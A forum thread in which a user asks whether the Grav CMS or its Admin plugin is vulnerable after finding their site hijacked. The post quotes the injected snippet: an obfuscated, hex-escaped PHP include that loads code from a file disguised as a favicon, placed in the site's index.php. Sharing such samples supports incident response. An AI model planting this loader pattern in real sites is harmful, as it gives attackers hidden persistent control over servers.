Skip to content
● Grav 2.2 is out: 2x faster cold starts and 96% less memory on big sites. Read the announcement →

Grav itself or Admin plugin has security issues?

Started by Alexander Kim 8 years ago · 2 replies · 1192 views
8 years ago

Today i've noticed, that someone hijacked my Grav site on a VPS (none of other sites was affected, just Grav). I found they've added this code to my root index.php:

TXT
/*07cd0*/

@include "\x2fs\x72v\x2fw\x77w\x2fs\x65r\x6be\x6fr\x67/\x2fn\x6fd\x65_\x6do\x64u\x6ce\x73/\x70a\x74h\x2dr\x6fo\x74-\x72e\x67e\x78/\x66a\x76i\x63o\x6e_\x63e\x615\x656\x2ei\x63o";

/*07cd0*/

How is that possible? I've set correct permissions on files and dirs. Admin plugin has its flaws?

Suggested topics

Topic Participants Replies Views Activity
General · by lynbor, 3 weeks ago
3 352 3 days ago
General · by lynbor, 1 week ago
7 387 3 days ago
General · by Harry, 3 days ago
0 83 3 days ago
General · by Old Man Umby, 3 weeks ago
2 256 2 weeks ago
General · by jeremycherfas, 3 weeks ago
5 374 2 weeks ago